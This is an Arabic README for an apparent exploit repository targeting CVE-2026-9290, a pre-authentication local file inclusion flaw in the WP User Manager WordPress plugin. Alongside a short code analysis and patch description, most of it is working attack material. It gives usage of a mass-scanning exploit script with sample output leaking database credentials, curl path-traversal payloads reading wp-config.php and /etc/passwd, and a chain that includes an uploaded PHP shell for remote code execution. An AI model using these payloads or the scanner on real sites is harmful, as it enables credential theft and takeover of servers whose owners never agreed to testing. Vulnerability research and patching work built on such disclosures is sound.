
تضمين ملفات محلي قبل المصادقة في WP User Manager <= 2.9.17 عبر اجتياز المسار في معامل tab (CVSS 7.5)
CVE-2026-9290 هي ثغرة تضمين ملفات محلية غير مصادقة عالية الخطورة (CVSS 7.5) في إضافة ووردبريس WP User Manager – User Profile Builder & Membership (≤ 2.9.17).
تمرر الدالة wpum_get_active_profile_tab() معامل الاستعلام tab مباشرة إلى محمّل قوالب Gamajo دون التحقق من القائمة البيضاء. تسمح تسلسلات اجتياز المسار في قيمة tab للمهاجمين غير المصادَق عليهم بتضمين ملفات عشوائية من الخادم عبر include() في PHP.
| إصدار WP User Manager | الحالة |
|---|---|
| ≤ 2.9.17 | قابلة للاستغلال |
| ≥ 2.9.18 | تم التصحيح |
في includes/functions.php، تأخذ الدالة wpum_get_active_profile_tab() معامل الاستعلام tab دون التحقق من القائمة البيضاء:
// Vulnerable: no whitelist check on $tab value
$tab = isset($_GET['tab']) ? sanitize_text_field($_GET['tab']) : 'profile';
wpum_get_active_profile_tab($tab);
تُمرَّر القيمة إلى Gamajo_Template_Loader::get_template_part() الذي يحلّ ملف القالب ويضمّنه:
// class-gamajo-template-loader.php line 226
include($template_path . $tab . '.php');
sanitize_text_field() لا يزيل تسلسلات اجتياز المسار. فتمرر ../../../wp-config كما هي.
GET /profile/?tab=../../../wp-config
→ wpum_get_active_profile_tab('../../../wp-config')
→ Gamajo_Template_Loader::include('../../../wp-config.php')
→ wp-config.php included → DB credentials exposed
أضاف الطلب #445 التحقق من القائمة البيضاء:
// Patched: check against registered tabs
if (!array_key_exists($tab, $registered_tabs)) {
$tab = 'profile'; // fallback to default
}
git clone https://github.com/shinthink/CVE-2026-9290.git
cd CVE-2026-9290
pip install -r requirements.txt
# Single target — LFI probe
python cve_2026_9290.py -t target.com
# Mass scan
python cve_2026_9290.py -f targets.txt -v
# Read specific file via LFI
python cve_2026_9290.py -t target.com --read "../../../wp-config.php"
# Save results
python cve_2026_9290.py -f targets.txt -o lfi.txt
-t, --target Single target (domain or IP)
-f, --file Target list, one per line
--read PATH Read a specific file via LFI
-o, --output Save results to file
--threads Workers (default: 25)
-v, --verbose Show detailed output
$ python cve_2026_9290.py -t target.com -v
CVE-2026-9290 — WP User Manager LFI → RCE Exploit
CVSS 7.5 | Pre-Auth | Path Traversal via 'tab' Parameter
[+] WP User Manager detected
[+] Profile page: /profile/
[+] LFI confirmed: wp-config.php (DB credentials)
[+] Content preview: define('DB_NAME', 'wordpress_db'); define('DB_USER', 'admin');
Host : target.com
WPUM : YES
LFI : YES
File : wp-config.php (DB credentials)
Time : 3.2s
[LFI] target-1.com 3.2s wp-config.php (DB credentials)
define('DB_NAME', 'wp_db'); define('DB_USER', 'root');
[LFI] target-2.com 4.1s wp-config.php (DB credentials)
define('DB_NAME', 'site_db'); define('DB_USER', 'admin');
[200/5458] 3% | WPUM:12 LFI:5 | current-target.com
الخطوة 1 — اكتشاف WP User Manager
curl -sk 'https://target.com/wp-content/plugins/wp-user-manager/readme.txt' | head -3
الخطوة 2 — العثور على صفحة الملف الشخصي
curl -sk 'https://target.com/' | grep -oP 'href="[^"]*(?:profile|account|dashboard)[^"]*"'
الخطوة 3 — LFI عبر معامل tab
# Read wp-config.php
curl -sk 'https://target.com/profile/?tab=../../../wp-config'
# Read /etc/passwd
curl -sk 'https://target.com/profile/?tab=../../../../../../../etc/passwd'
# RCE — include uploaded PHP shell
curl -sk 'https://target.com/profile/?tab=../../../wp-content/uploads/2026/07/shell'
1. LFI → read wp-config.php → get DB credentials
2. Upload PHP shell via another plugin/media endpoint
3. LFI → include uploaded shell → RCE
لأغراض التعليم والاختبار المصرّح به فقط.
هذا البرنامج مخصص للمتخصصين في الأمن الذين يجرون اختبارات اختراق مصرّحًا بها، والمؤسسات التي تدقق بنيتها التحتية الخاصة، والباحثين الذين يدرسون استغلال الثغرات.
الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني وقد ينتهك:
- الولايات المتحدة: قانون الاحتيال وإساءة استخدام الكمبيوتر (18 U.S.C. 1030)
- إندونيسيا: UU ITE Pasal 30 & 46
- الاتحاد الأوروبي: التوجيه 2013/40/EU
- المملكة المتحدة: قانون إساءة استخدام الكمبيوتر لعام 1990
لا يتحمل المؤلفون أي مسؤولية عن سوء الاستخدام.
| المورد |
|---|
هذا المشروع غير تابع لـ WP User Manager أو Carbon Fields.
| الملف | السطر | الدور |
|---|
includes/functions.php | #L955 | wpum_get_active_profile_tab() — بدون قائمة بيضاء |
templates/profile.php | #L52 | نطاق قالب الملف الشخصي |
class-gamajo-template-loader.php | #L226 | استدعاء include() غير منقّى |
| الرابط |
|---|
| استشارة GitHub | GHSA-83v9-496w-54wx |
| استشارة Wordfence | wordfence.com |
| طلب التصحيح | GitHub #445 |
| تحليل IONIX | ionix.io |